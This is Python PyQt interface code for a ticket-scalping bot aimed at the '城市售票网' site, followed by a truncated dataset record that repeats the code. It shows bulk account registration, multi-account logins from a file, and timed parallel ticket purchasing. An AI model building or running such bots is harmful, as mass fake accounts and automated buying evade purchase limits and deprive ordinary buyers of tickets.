self.pushButton_3.setGeometry(QtCore.QRect(30, 160, 54, 31))
self.pushButton_3.setObjectName("pushButton_3")
self.pushButton_3.clicked.connect(self.search_2)
# 退出程序按钮
self.pushButton_quit = QtWidgets.QPushButton(self.tab_2)
self.pushButton_quit.setGeometry(QtCore.QRect(460, 160, 54, 31))
self.pushButton_quit.setObjectName("pushButton_quit")
self.pushButton_quit.clicked.connect(self.exit_quit)
self.label_4 = QtWidgets.QLabel(self.tab_2)
self.label_4.setGeometry(QtCore.QRect(30, 210, 54, 12))
self.label_4.setObjectName("label_4")
# 购买日志输出
self.textBrowser_1 = QtWidgets.QTextBrowser(self.tab_2)
self.textBrowser_1.setGeometry(QtCore.QRect(30, 230, 521, 192))
self.textBrowser_1.setObjectName("textBrowser")
# 添加显示数据
# self.textBrowser_1.append('购买日志')
# 抢票中心页面
self.tabWidget.addTab(self.tab_2, "")
MainWindow.setCentralWidget(self.centralwidget)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
# 账号注册页面
self.tabWidget.addTab(self.tab_3, "")
MainWindow.setCentralWidget(self.centralwidget)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
# 点击注册按钮
self.pushButton_4 = QtWidgets.QPushButton(self.tab_3)
self.pushButton_4.setGeometry(QtCore.QRect(200, 110, 120, 30))
self.pushButton_4.setObjectName("pushButton")
# 注册个数输入框
self.lineEdit_tab3 = QtWidgets.QLineEdit(self.tab_3)
self.lineEdit_tab3.setGeometry(QtCore.QRect(318, 111, 120, 28))
self.lineEdit_tab3.setPlaceholderText(" 请输入注册个数")
# 注册日志输出
self.textBrowser_3 = QtWidgets.QTextBrowser(self.tab_3)
self.textBrowser_3.setGeometry(QtCore.QRect(30, 200, 561, 221))
self.textBrowser_3.setObjectName("textBrowser_3")
self.label_5 = QtWidgets.QLabel(self.tab_3)
self.label_5.setGeometry(QtCore.QRect(30, 180, 54, 12))
self.label_5.setObjectName("label_5")
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "城市售票网-抢票"))
self.pushButton.setText(_translate("MainWindow", "点击登录"))
self.pushButton.clicked.connect(self.login)
self.pushButton_4.clicked.connect(self.register)
self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab), _translate("MainWindow", "账号登录"))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_2), _translate("MainWindow", "抢购中心"))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_3), _translate("MainWindow", "账号注册"))
self.label_0.setText(_translate("MainWindow", "登录日志:"))
self.pushButton_2.setText(_translate("MainWindow", "搜索名称"))
self.pushButton_3.setText(_translate("MainWindow", "点击购买"))
self.pushButton_quit.setText(_translate("MainWindow", "退出程序"))
self.pushButton_4.setText(_translate("MainWindow", "点击注册"))
self.label.setText(_translate("MainWindow", "已择场次:"))
self.label_2.setText(_translate("MainWindow", "已择价格:"))
self.label_3.setText(_translate("MainWindow", "购买总数量:"))
self.label_4.setText(_translate("MainWindow", "购买日志:"))
self.label_5.setText(_translate("MainWindow", "注册日志:"))
self.label_6.setText(_translate("MainWindow", "已购买:"))
self.label_7.setText(_translate("MainWindow", "0"))
self.label_8.setText(_translate("MainWindow", "每个账号购买数量:"))
self.textBrowser_3.setText("")
self.textBrowser_2.setText("")
self.textBrowser_1.setText("")
self.tabWidget.setCurrentIndex(0)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
# 点击登录执行
def login(self):
try:
regiterSum = int(self.lineEdit_tab.text())
except Exception as err:
res = QMessageBox.question(self, '提示', '请输入正整数!', QMessageBox.Ok) # 提示框
return
ipList = [""]
# ipList = request_tickets_spider.get_ip_list(10)
self.textBrowser_2.append("开始登陆,请等待...")
userinfo_list = []
with open('infomation.txt', 'rt', encoding='utf-8') as f:
info_record = re.findall("'loginId': '(.*?)'", f.read())
for loginId in info_record:
userinfo_list.append(loginId)
# 多线程
for thr in userinfo_list[:regiterSum]:
grabber = BuyUrbtix()
ip = random.choice(ipList)
Thread_name = Thread(target=grabber.openSite, args=(thr,ip))
self.threads.append(Thread_name)
Thread_name.setDaemon(True)
Thread_name.start()
# 点击搜索按钮执行
def search_1(self):
keyword = self.lineEdit.text()
self.textBrowser_1.append("正在查询 %s 的所有场次和价格..." % keyword)
if keyword == self.keywordJudge:
self.textBrowser_1.append("请等待...")
self.keywordJudge = ''
return
self.keywordJudge = keyword
Thread_name = Thread(target=self.refresh)
self.threads.append(Thread_name)
Thread_name.start()
Thread_01 = Thread(target=self.show_session_data)
self.threads.append(Thread_01)
Thread_01.start()
# 把选择的场次和价格显示到主界面
def show_session_data(self):
global SHOW_S_P
self.comboBox_2.clear()
self.comboBox.clear()
while True:
# if self.ex.sessionName and self.ex.sessionPrice:
if ex.sessionName and ex.sessionPrice and SHOW_S_P:
for i,eventDateName in enumerate(ex.sessionName):
self.comboBox_2.addItem(eventDateName, i)
for i,price in enumerate(ex.sessionPrice):
self.comboBox.addItem(str(price), i)# 价格
self.comboBox.setCurrentIndex(0)
self.comboBox_2.setCurrentIndex(0)
ex.sessionName.clear()
ex.sessionPrice.clear()
SHOW_S_P = False
time.sleep(0.2)
# 把信息刷新到界面
def refresh(self):
try:
if self.lineEdit.text():
global eventDateList
keyword = self.lineEdit.text()
my_attr['selNum'] = self.lineEdit_8.text()
ex.eventDateList = request_spider.get_date_url(keyword)
if ex.eventDateList:
self.textBrowser_1.append("查询成功,请在选择界面选择场次和价格...")
global SESSION_DATA
SESSION_DATA = True
# ex.create_c()
else:
self.textBrowser_1.append("查询失败,请确定您查询的节目存在...")
else:
sys.exit()
except Exception as err:
self.textBrowser_1.append("查询失败,请确定您查询的节目存在...")
print(err)
sys.exit()
# 日志更新
def output_login_status(self):
# 登录成功输出
while True:
# 登陆日志
login_record_list = login_record()
if login_record_list:
for i in login_record_list:
self.textBrowser_2.append(i)
self.textBrowser_2.moveCursor(self.textBrowser_2.textCursor().End)
login_record_list.remove(i)
time.sleep(0.1)
# 购买日志
def output_buy_record(self):
while True:
buy_record_list = buy_record()
if buy_record_list:
for record in buy_record_list:
if "购买成功" in record:
self.buy_succeed_count += 1
self.label_7.setText(str(self.buy_succeed_count))
self.textBrowser_1.append(record)
self.textBrowser_1.moveCursor(self.textBrowser_1.textCursor().End)
buy_record_list.remove(record)
time.sleep(0.1)
# 注册日志
def output_register_record(self):
while True:
register_record_list = register_record()
if register_record_list:
for i in register_record_list:
self.textBrowser_3.append(i)
self.textBrowser_3.moveCursor(self.textBrowser_3.textCursor().End)
register_record_list.remove(i)
time.sleep(0.1)
# 购买条件选择后点击执行
def search_2(self):
if not self.lineEdit_1.text():
self.textBrowser_1.append("请输入购买总数量...")
return
if my_attr['selNum'] and my_attr['selPrice'] and my_attr['selSeatUrl']:
self.textBrowser_1.append("正在购买,请等待...")
return
if ex.saleTime:
Thread_name = Thread(target=self.wait_sale)
Thread_name.setDaemon(True)
Thread_name.start()
return
my_attr['gross'] = self.lineEdit_1.text()
my_attr['selNum'] = self.lineEdit_8.text()
my_attr['selPrice'] = ex.eventPrice
my_attr['selSeatUrl'] = ex.eventUrl
self.textBrowser_1.append("开始购买,请您耐心等待...")
def wait_sale(self):
dateList = ex.saleTime
print("%s年%s月%s日%s时开始售票,等待购买!" % tuple(dateList))
self.textBrowser_1.append("%s年%s月%s日%s时开始售票,等待购买!" % tuple(dateList))
while True:
saleTimestamp = int(time.mktime(time.strptime(''.join(dateList) + '0000', "%Y%m%d%H%M%S")))
if saleTimestamp <= int(time.time()):
print("%s年%s月%s日%s时开始售票,开始购买!" % tuple(dateList))
self.textBrowser_1.append("%s年%s月%s日%s时开始售票,开始购买!" % tuple(dateList))
break
time.sleep(1)
my_attr['gross'] = self.lineEdit_1.text()
my_attr['selNum'] = self.lineEdit_8.text()
my_attr['selPrice'] = ex.eventPrice
my_attr['selSeatUrl'] = ex.eventUrl
self.textBrowser_1.append("开始购买,请您耐心等待...")
#点击注册执行并打印注册
def register(self):
self.textBrowser_3.append("开始注册,请等待...")
try:
regiterSum = int(self.lineEdit_tab3.text())
except Exception as err:
res = QMessageBox.question(self, '提示', '请输入正整数!', QMessageBox.Ok) # 提示框
return
threads = []
for _ in range(regiterSum):
uper = Register()
Thread_name = Thread(target=uper.registerInfo)
Thread_name.setDaemon(True)
Thread_name.start()
threads.append(Thread_name)
# 退出程序
def exit_quit(self):
global EXIT_COND
res = QMessageBox.question(self, '提示', '您确定要退出程序吗!', QMessageBox.Yes | QMessageBox.No) # 提示框
if res == QMessageBox.Yes:
self._thread.exit_thread()
time.sleep(1)
sys.exit()
else:
pass
class Example(QMainWindow):
sessionList = []
priceList = []
sessionListEvn = []
priceListEvn = []
eventDateList = []
eventUrl = []
eventPrice = []
sessionName = []
sessionPrice = []
saleTime = []
buyNum = 1
def __init__(self):
super(QMainWindow, self).__init__()
self.setWindowTitle('城市售票网') # 主窗口
self.resize(680, 800)
# 取消最大化
self.setWindowFlags(QtCore.Qt.WindowMinimizeButtonHint)
# 固定窗口大小
self.setFixedSize(self.width(), self.height())
self.w = QWidget()
self.w.setFixedWidth(680)
self.w.setFixedHeight(540)
self.setCentralWidget(self.w)
self.topFiller = QWidget()
# 把布局放入到 w 窗口
# 创建一个滚动条
self.scroll = QScrollArea()
self.scroll.setWidget(self.topFiller) # 滚动条放self.topFiller
self.vbox = QVBoxLayout() # 方框布局
self.vbox.addWidget(self.scroll) # 滚动条放入布局
self.w.setLayout(self.vbox)
self.initUI()
def closeEvent(self, QCloseEvent):
res = QMessageBox.question(self,'提示','您确定选择无误吗?',QMessageBox.Yes|QMessageBox.No,QMessageBox.No) #两个按钮是否, 默认No则关闭这个提示框
if res == QMessageBox.Yes:
global SHOW_S_P
SHOW_S_P = True
QCloseEvent.accept()
self.cb1.setChecked(False)
self.cb2.setChecked(False)
else:
QCloseEvent.ignore()
def initUI(self):
#新建全选复选框对象
self.cb1 = QCheckBox('全选',self.topFiller)
self.cb1.move(20,30)
self.cb2 = QCheckBox('全选',self)
self.cb2.move(20, 570)
# 创建按钮
bt1 = QPushButton('确定',self)
bt2 = QPushButton('刷新',self)
bt1.move(20,760)
bt2.move(120,760)
# 每当复选框的状态改变时,即每当用户选中或取消选中该信号时,就会发出此信号。
# 所以当产生此信号的时候,我们将其连接相应的槽函数。
self.cb1.stateChanged.connect(self.changecb1) # 全选复选框连接到全选槽函数
self.cb2.stateChanged.connect(self.changecb2) # 全选复选框连接到全选槽函数
bt1.clicked.connect(self.pitch_on) # 连接到显示选中单元
bt2.clicked.connect(self.create_c) # 连接到创建函数
def create_c(self):
if self.eventDateList:
self.sessionList = [eventDateName['eventDateName'] for eventDateName in self.eventDateList]
self.priceList = [price for price in self.eventDateList[0]['priceList']]
# print(self.priceList)
# print(self.sessionList)
ex.show()
else:
ex.show()
QMessageBox.question(self, '提示', '搜索内容不存在!', QMessageBox.Ok)
return
# 清空上次搜索内容
if self.sessionListEvn and self.priceListEvn:
for s_evn in self.sessionListEvn:
s_evn.deleteLater()
for p_evn in self.priceListEvn:
p_evn.deleteLater()
self.sessionListEvn.clear()
self.priceListEvn.clear()
self.eventPrice.clear()
self.eventUrl.clear()
# 场次信息显示
for i,item in enumerate(self.sessionList):
cb = QCheckBox(item, self.topFiller)
cb.move(30, 60+30*i)
self.sessionListEvn.append(cb)
cb.show()
self.topFiller.setMinimumSize(580,(len(self.sessionList)+5)*30) #设置滚动条的尺寸
# 价格显示
for i,item in enumerate(self.priceList):
cb_1 = QCheckBox(str(item), self)
if i % 2 == 0:
i = i // 2 + 1
cb_1.move(30, 570+30*i)
else:
i = i // 2 + 1
cb_1.move(330, 570+30*i)
self.priceListEvn.append(cb_1)
cb_1.show()
def pitch_on(self):
if self.sessionList:
for i in self.sessionListEvn: # 遍历所有复选框
if i.isChecked(): # 判断是否被选中
for eventDate in self.eventDateList: # 遍历所有的数据
if eventDate['eventDateName'] == i.text(): # 判断数据是否被选中
if 'saleDate' in eventDate:
self.saleTime = eventDate['saleDate']
# print(eventDate['saleDate'])
self.eventUrl.append(eventDate["eventUrl"]) # 被选中则保存
self.sessionName.append(eventDate['eventDateName'])
for i in self.priceListEvn:
if i.isChecked():
if i.text() in self.eventDateList[0]['priceList']:
self.eventPrice.append(str(self.eventDateList[0]['priceList'].index(i.text())))
self.sessionPrice.append(i.text())
# 如果选择的有数据,则关闭窗口,没有数据,提示选择数据
if self.eventPrice and self.eventUrl:
self.close()
else:
res = QMessageBox.question(self, '提示', '您没有选择或价格场次,确定退出吗?', QMessageBox.Yes | QMessageBox.No,
QMessageBox.No) # 两个按钮是否, 默认No则关闭这个提示框
if res == QMessageBox.Yes:
self.close()
else:
print("输入内容不存在!")
# 全选复选框槽函数
def changecb1(self):
if self.cb1.checkState() == Qt.Checked:
for qcb in self.sessionListEvn:
qcb.setChecked(True)
elif self.cb1.checkState() == Qt.Unchecked:
for qcb in self.sessionListEvn:
qcb.setChecked(False)
# 全选复选框槽函数
def changecb2(self):
if self.cb2.checkState() == Qt.Checked:
for qcb in self.priceListEvn:
qcb.setChecked(True)
elif self.cb2.checkState() == Qt.Unchecked:
for qcb in self.priceListEvn:
qcb.setChecked(False)
# 刷新按钮
def refresh_cb(self):
while True:
if self.sessionList and self.priceList:
self.create_c()
break
time.sleep(0.2)
if __name__ == '__main__':
app = QtWidgets.QApplication(sys.argv) # 创建一个QApplication,也就是你要开发的软件app
ex = Example()
MainWindow = QtWidgets.QMainWindow() # 创建一个QMainWindow,用来装载你需要的各种组件、控件
ui = Ui_MainWindow() # ui是你创建的ui类的实例化对象
ui.setupUi(MainWindow) # 执行类中的setupUi方法,方法的参数是第二步中创建的QMainWindow
MainWindow.show() # 执行QMainWindow的show()方法,显示这个QMainWindow
# ex.show()
sys.exit(app.exec_())
|
normal
|
{
"blob_id": "bc0846397a5ad73b1c4b85e12864b27ef4fd08d7",
"index": 5358,
"step-1": "<mask token>\n\n\nclass Ui_MainWindow(QMainWindow):\n threads = []\n keywordJudge = ''\n\n def __init__(self):\n super(Ui_MainWindow, self).__init__()\n self.buy_succeed_count = 0\n for func in [self.output_buy_record, self.output_login_status, self\n .output_register_record]:\n thr = Thread(target=func)\n thr.setDaemon(True)\n thr.start()\n self._thread = Worker(self)\n self._thread.finished.connect(self._thread.deleteLater)\n self._thread.valueChanged.connect(ex.create_c)\n self._thread.start()\n\n def setupUi(self, MainWindow):\n MainWindow.setObjectName('MainWindow')\n MainWindow.resize(640, 478)\n MainWindow.setWindowFlags(QtCore.Qt.WindowMinimizeButtonHint)\n MainWindow.setFixedSize(self.width(), self.height())\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setObjectName('centralwidget')\n self.tabWidget = QtWidgets.QTabWidget(self.centralwidget)\n self.tabWidget.setGeometry(QtCore.QRect(0, 0, 631, 461))\n self.tabWidget.setObjectName('tabWidget')\n self.tab = QtWidgets.QWidget()\n self.tab.setObjectName('tab')\n self.pushButton = QtWidgets.QPushButton(self.tab)\n self.pushButton.setGeometry(QtCore.QRect(200, 110, 120, 30))\n self.pushButton.setObjectName('pushButton')\n self.lineEdit_tab = QtWidgets.QLineEdit(self.tab)\n self.lineEdit_tab.setGeometry(QtCore.QRect(318, 111, 120, 28))\n self.lineEdit_tab.setPlaceholderText(' 请输入登陆个数')\n self.label_0 = QtWidgets.QLabel(self.tab)\n self.label_0.setGeometry(QtCore.QRect(30, 180, 54, 12))\n self.label_0.setObjectName('label_0')\n self.textBrowser_2 = QtWidgets.QTextBrowser(self.tab)\n self.textBrowser_2.setGeometry(QtCore.QRect(30, 200, 561, 221))\n self.textBrowser_2.setObjectName('textBrowser_2')\n self.tabWidget.addTab(self.tab, '')\n self.tab_2 = QtWidgets.QWidget()\n self.tab_2.setObjectName('tab_2')\n self.tabWidget.addTab(self.tab, '')\n self.tab_3 = QtWidgets.QWidget()\n self.tab_3.setObjectName('tab_3')\n self.lineEdit = QtWidgets.QLineEdit(self.tab_2)\n self.lineEdit.setGeometry(QtCore.QRect(90, 30, 171, 31))\n self.lineEdit.setObjectName('lineEdit')\n self.pushButton_2 = QtWidgets.QPushButton(self.tab_2)\n self.pushButton_2.setGeometry(QtCore.QRect(30, 30, 58, 32))\n self.pushButton_2.setObjectName('pushButton_2')\n self.pushButton_2.clicked.connect(self.search_1)\n self.label = QtWidgets.QLabel(self.tab_2)\n self.label.setGeometry(QtCore.QRect(30, 80, 54, 12))\n self.label.setObjectName('label')\n self.label_2 = QtWidgets.QLabel(self.tab_2)\n self.label_2.setGeometry(QtCore.QRect(30, 130, 54, 12))\n self.label_2.setObjectName('label_2')\n self.comboBox = QtWidgets.QComboBox(self.tab_2)\n self.comboBox.setGeometry(QtCore.QRect(90, 120, 191, 31))\n self.comboBox.setObjectName('comboBox')\n self.comboBox_2 = QtWidgets.QComboBox(self.tab_2)\n self.comboBox_2.setGeometry(QtCore.QRect(90, 70, 459, 31))\n self.comboBox_2.setObjectName('comboBox_2')\n self.label_3 = QtWidgets.QLabel(self.tab_2)\n self.label_3.setGeometry(QtCore.QRect(300, 40, 70, 12))\n self.label_3.setObjectName('label_3')\n self.lineEdit_1 = QtWidgets.QLineEdit(self.tab_2)\n self.lineEdit_1.setGeometry(QtCore.QRect(375, 32, 51, 27))\n self.lineEdit_1.setObjectName('lineEdit_1')\n self.label_6 = QtWidgets.QLabel(self.tab_2)\n self.label_6.setGeometry(QtCore.QRect(450, 40, 54, 12))\n self.label_6.setObjectName('label_6')\n self.label_7 = QtWidgets.QLabel(self.tab_2)\n self.label_7.setGeometry(QtCore.QRect(500, 40, 54, 12))\n self.label_7.setObjectName('label_7')\n self.label_7.setStyleSheet('font-size:16px;color:red')\n self.label_8 = QtWidgets.QLabel(self.tab_2)\n self.label_8.setGeometry(QtCore.QRect(300, 130, 100, 12))\n self.label_8.setObjectName('label_8')\n self.lineEdit_8 = QtWidgets.QLineEdit(self.tab_2)\n self.lineEdit_8.setGeometry(QtCore.QRect(415, 122, 51, 27))\n self.lineEdit_8.setObjectName('lineEdit_8')\n self.lineEdit_8.setText('4')\n self.pushButton_3 = QtWidgets.QPushButton(self.tab_2)\n self.pushButton_3.setGeometry(QtCore.QRect(30, 160, 54, 31))\n self.pushButton_3.setObjectName('pushButton_3')\n self.pushButton_3.clicked.connect(self.search_2)\n self.pushButton_quit = QtWidgets.QPushButton(self.tab_2)\n self.pushButton_quit.setGeometry(QtCore.QRect(460, 160, 54, 31))\n self.pushButton_quit.setObjectName('pushButton_quit')\n self.pushButton_quit.clicked.connect(self.exit_quit)\n self.label_4 = QtWidgets.QLabel(self.tab_2)\n self.label_4.setGeometry(QtCore.QRect(30, 210, 54, 12))\n self.label_4.setObjectName('label_4')\n self.textBrowser_1 = QtWidgets.QTextBrowser(self.tab_2)\n self.textBrowser_1.setGeometry(QtCore.QRect(30, 230, 521, 192))\n self.textBrowser_1.setObjectName('textBrowser')\n self.tabWidget.addTab(self.tab_2, '')\n MainWindow.setCentralWidget(self.centralwidget)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName('statusbar')\n MainWindow.setStatusBar(self.statusbar)\n self.tabWidget.addTab(self.tab_3, '')\n MainWindow.setCentralWidget(self.centralwidget)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName('statusbar')\n MainWindow.setStatusBar(self.statusbar)\n self.pushButton_4 = QtWidgets.QPushButton(self.tab_3)\n self.pushButton_4.setGeometry(QtCore.QRect(200, 110, 120, 30))\n self.pushButton_4.setObjectName('pushButton')\n self.lineEdit_tab3 = QtWidgets.QLineEdit(self.tab_3)\n self.lineEdit_tab3.setGeometry(QtCore.QRect(318, 111, 120, 28))\n self.lineEdit_tab3.setPlaceholderText(' 请输入注册个数')\n self.textBrowser_3 = QtWidgets.QTextBrowser(self.tab_3)\n self.textBrowser_3.setGeometry(QtCore.QRect(30, 200, 561, 221))\n self.textBrowser_3.setObjectName('textBrowser_3')\n self.label_5 = QtWidgets.QLabel(self.tab_3)\n self.label_5.setGeometry(QtCore.QRect(30, 180, 54, 12))\n self.label_5.setObjectName('label_5')\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate('MainWindow', '城市售票网-抢票'))\n self.pushButton.setText(_translate('MainWindow', '点击登录'))\n self.pushButton.clicked.connect(self.login)\n self.pushButton_4.clicked.connect(self.register)\n self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab),\n _translate('MainWindow', '账号登录'))\n self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_2),\n _translate('MainWindow', '抢购中心'))\n self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_3),\n _translate('MainWindow', '账号注册'))\n self.label_0.setText(_translate('MainWindow', '登录日志:'))\n self.pushButton_2.setText(_translate('MainWindow', '搜索名称'))\n self.pushButton_3.setText(_translate('MainWindow', '点击购买'))\n self.pushButton_quit.setText(_translate('MainWindow', '退出程序'))\n self.pushButton_4.setText(_translate('MainWindow', '点击注册'))\n self.label.setText(_translate('MainWindow', '已择场次:'))\n self.label_2.setText(_translate('MainWindow', '已择价格:'))\n self.label_3.setText(_translate('MainWindow', '购买总数量:'))\n self.label_4.setText(_translate('MainWindow', '购买日志:'))\n self.label_5.setText(_translate('MainWindow', '注册日志:'))\n self.label_6.setText(_translate('MainWindow', '已购买:'))\n self.label_7.setText(_translate('MainWindow', '0'))\n self.label_8.setText(_translate('MainWindow', '每个账号购买数量:'))\n self.textBrowser_3.setText('')\n self.textBrowser_2.setText('')\n self.textBrowser_1.setText('')\n self.tabWidget.setCurrentIndex(0)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n def login(self):\n try:\n regiterSum = int(self.lineEdit_tab.text())\n except Exception as err:\n res = QMessageBox.question(self, '提示', '请输入正整数!', QMessageBox.Ok)\n return\n ipList = ['']\n self.textBrowser_2.append('开始登陆,请等待...')\n userinfo_list = []\n with open('infomation.txt', 'rt', encoding='utf-8') as f:\n info_record = re.findall(\"'loginId': '(.*?)'\", f.read())\n for loginId in info_record:\n userinfo_list.append(loginId)\n for thr in userinfo_list[:regiterSum]:\n grabber = BuyUrbtix()\n ip = random.choice(ipList)\n Thread_name = Thread(target=grabber.openSite, args=(thr, ip))\n self.threads.append(Thread_name)\n Thread_name.setDaemon(True)\n Thread_name.start()\n\n def search_1(self):\n keyword = self.lineEdit.text()\n self.textBrowser_1.append('正在查询 %s 的所有场次和价格...' % keyword)\n if keyword == self.keywordJudge:\n self.textBrowser_1.append('请等待...')\n self.keywordJudge = ''\n return\n self.keywordJudge = keyword\n Thread_name = Thread(target=self.refresh)\n self.threads.append(Thread_name)\n Thread_name.start()\n Thread_01 = Thread(target=self.show_session_data)\n self.threads.append(Thread_01)\n Thread_01.start()\n\n def show_session_data(self):\n global SHOW_S_P\n self.comboBox_2.clear()\n self.comboBox.clear()\n while True:\n if ex.sessionName and ex.sessionPrice and SHOW_S_P:\n for i, eventDateName in enumerate(ex.sessionName):\n self.comboBox_2.addItem(eventDateName, i)\n for i, price in enumerate(ex.sessionPrice):\n self.comboBox.addItem(str(price), i)\n self.comboBox.setCurrentIndex(0)\n self.comboBox_2.setCurrentIndex(0)\n ex.sessionName.clear()\n ex.sessionPrice.clear()\n SHOW_S_P = False\n time.sleep(0.2)\n\n def refresh(self):\n try:\n if self.lineEdit.text():\n global eventDateList\n keyword = self.lineEdit.text()\n my_attr['selNum'] = self.lineEdit_8.text()\n ex.eventDateList = request_spider.get_date_url(keyword)\n if ex.eventDateList:\n self.textBrowser_1.append('查询成功,请在选择界面选择场次和价格...')\n global SESSION_DATA\n SESSION_DATA = True\n else:\n self.textBrowser_1.append('查询失败,请确定您查询的节目存在...')\n else:\n sys.exit()\n except Exception as err:\n self.textBrowser_1.append('查询失败,请确定您查询的节目存在...')\n print(err)\n sys.exit()\n\n def output_login_status(self):\n while True:\n login_record_list = login_record()\n if login_record_list:\n for i in login_record_list:\n self.textBrowser_2.append(i)\n self.textBrowser_2.moveCursor(self.textBrowser_2.\n textCursor().End)\n login_record_list.remove(i)\n time.sleep(0.1)\n\n def output_buy_record(self):\n while True:\n buy_record_list = buy_record()\n if buy_record_list:\n for record in buy_record_list:\n if '购买成功' in record:\n self.buy_succeed_count += 1\n self.label_7.setText(str(self.buy_succeed_count))\n self.textBrowser_1.append(record)\n self.textBrowser_1.moveCursor(self.textBrowser_1.\n textCursor().End)\n buy_record_list.remove(record)\n time.sleep(0.1)\n\n def output_register_record(self):\n while True:\n register_record_list = register_record()\n if register_record_list:\n for i in register_record_list:\n self.textBrowser_3.append(i)\n self.textBrowser_3.moveCursor(self.textBrowser_3.\n textCursor().End)\n register_record_list.remove(i)\n time.sleep(0.1)\n\n def search_2(self):\n if not self.lineEdit_1.text():\n self.textBrowser_1.append('请输入购买总数量...')\n return\n if my_attr['selNum'] and my_attr['selPrice'] and my_attr['selSeatUrl']:\n self.textBrowser_1.append('正在购买,请等待...')\n return\n if ex.saleTime:\n Thread_name = Thread(target=self.wait_sale)\n Thread_name.setDaemon(True)\n Thread_name.start()\n return\n my_attr['gross'] = self.lineEdit_1.text()\n my_attr['selNum'] = self.lineEdit_8.text()\n my_attr['selPrice'] = ex.eventPrice\n my_attr['selSeatUrl'] = ex.eventUrl\n self.textBrowser_1.append('开始购买,请您耐心等待...')\n\n def wait_sale(self):\n dateList = ex.saleTime\n print('%s年%s月%s日%s时开始售票,等待购买!' % tuple(dateList))\n self.textBrowser_1.append('%s年%s月%s日%s时开始售票,等待购买!' % tuple(dateList))\n while True:\n saleTimestamp = int(time.mktime(time.strptime(''.join(dateList) +\n '0000', '%Y%m%d%H%M%S')))\n if saleTimestamp <= int(time.time()):\n print('%s年%s月%s日%s时开始售票,开始购买!' % tuple(dateList))\n self.textBrowser_1.append('%s年%s月%s日%s时开始售票,开始购买!' % tuple(\n dateList))\n break\n time.sleep(1)\n my_attr['gross'] = self.lineEdit_1.text()\n my_attr['selNum'] = self.lineEdit_8.text()\n my_attr['selPrice'] = ex.eventPrice\n my_attr['selSeatUrl'] = ex.eventUrl\n self.textBrowser_1.append('开始购买,请您耐心等待...')\n\n def register(self):\n self.textBrowser_3.append('开始注册,请等待...')\n try:\n regiterSum = int(self.lineEdit_tab3.text())\n except Exception as err:\n res = QMessageBox.question(self, '提示', '请输入正整数!', QMessageBox.Ok)\n return\n threads = []\n for _ in range(regiterSum):\n uper = Register()\n Thread_name = Thread(target=uper.registerInfo)\n Thread_name.setDaemon(True)\n Thread_name.start()\n threads.append(Thread_name)\n\n def exit_quit(self):\n global EXIT_COND\n res = QMessageBox.question(self, '提示', '您确定要退出程序吗!', QMessageBox.\n Yes | QMessageBox.No)\n if res == QMessageBox.Yes:\n self._thread.exit_thread()\n time.sleep(1)\n sys.exit()\n else:\n pass\n\n\nclass Example(QMainWindow):\n sessionList = []\n priceList = []\n sessionListEvn = []\n priceListEvn = []\n eventDateList = []\n eventUrl = []\n eventPrice = []\n sessionName = []\n sessionPrice = []\n saleTime = []\n buyNum = 1\n\n def __init__(self):\n super(QMainWindow, self).__init__()\n self.setWindowTitle('城市售票网')\n self.resize(680, 800)\n self.setWindowFlags(QtCore.Qt.WindowMinimizeButtonHint)\n self.setFixedSize(self.width(), self.height())\n self.w = QWidget()\n self.w.setFixedWidth(680)\n self.w.setFixedHeight(540)\n self.setCentralWidget(self.w)\n self.topFiller = QWidget()\n self.scroll = QScrollArea()\n self.scroll.setWidget(self.topFiller)\n self.vbox = QVBoxLayout()\n self.vbox.addWidget(self.scroll)\n self.w.setLayout(self.vbox)\n self.initUI()\n\n def closeEvent(self, QCloseEvent):\n res = QMessageBox.question(self, '提示', '您确定选择无误吗?', QMessageBox.Yes |\n QMessageBox.No, QMessageBox.No)\n if res == QMessageBox.Yes:\n global SHOW_S_P\n SHOW_S_P = True\n QCloseEvent.accept()\n self.cb1.setChecked(False)\n self.cb2.setChecked(False)\n else:\n QCloseEvent.ignore()\n\n def initUI(self):\n self.cb1 = QCheckBox('全选', self.topFiller)\n self.cb1.move(20, 30)\n self.cb2 = QCheckBox('全选', self)\n self.cb2.move(20, 570)\n bt1 = QPushButton('确定', self)\n bt2 = QPushButton('刷新', self)\n bt1.move(20, 760)\n bt2.move(120, 760)\n self.cb1.stateChanged.connect(self.changecb1)\n self.cb2.stateChanged.connect(self.changecb2)\n bt1.clicked.connect(self.pitch_on)\n bt2.clicked.connect(self.create_c)\n\n def create_c(self):\n if self.eventDateList:\n self.sessionList = [eventDateName['eventDateName'] for\n eventDateName in self.eventDateList]\n self.priceList = [price for price in self.eventDateList[0][\n 'priceList']]\n ex.show()\n else:\n ex.show()\n QMessageBox.question(self, '提示', '搜索内容不存在!', QMessageBox.Ok)\n return\n if self.sessionListEvn and self.priceListEvn:\n for s_evn in self.sessionListEvn:\n s_evn.deleteLater()\n for p_evn in self.priceListEvn:\n p_evn.deleteLater()\n self.sessionListEvn.clear()\n self.priceListEvn.clear()\n self.eventPrice.clear()\n self.eventUrl.clear()\n for i, item in enumerate(self.sessionList):\n cb = QCheckBox(item, self.topFiller)\n cb.move(30, 60 + 30 * i)\n self.sessionListEvn.append(cb)\n cb.show()\n self.topFiller.setMinimumSize(580, (len(self.sessionList) + 5) * 30)\n for i, item in enumerate(self.priceList):\n cb_1 = QCheckBox(str(item), self)\n if i % 2 == 0:\n i = i // 2 + 1\n cb_1.move(30, 570 + 30 * i)\n else:\n i = i // 2 + 1\n cb_1.move(330, 570 + 30 * i)\n self.priceListEvn.append(cb_1)\n cb_1.show()\n\n def pitch_on(self):\n if self.sessionList:\n for i in self.sessionListEvn:\n 